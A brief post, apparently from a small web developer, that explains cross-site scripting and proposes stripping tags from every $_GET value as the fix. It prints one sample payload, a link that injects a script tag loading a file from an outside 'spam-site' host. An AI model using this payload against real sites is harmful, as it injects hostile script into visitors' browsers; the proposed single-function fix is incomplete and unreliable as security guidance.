This is called cross site scripting (XSS) attacks.
How peoples exploits just using input fields which generally provided on the site.
<A HREF="http://sitename.com/comment.cmi? mycomment=<SCRIPT SRC='http://spam-site/badfile'></SCRIPT>"> Click here</A>
There might be different solution to solve this. for as we have find one unquie way. just use strip_tags in each $_GET method. if you think that there are any other method and there are different ways. or your comments and suggessions are welcomed.
Solution by : Runwalsoft (Manish Runwal)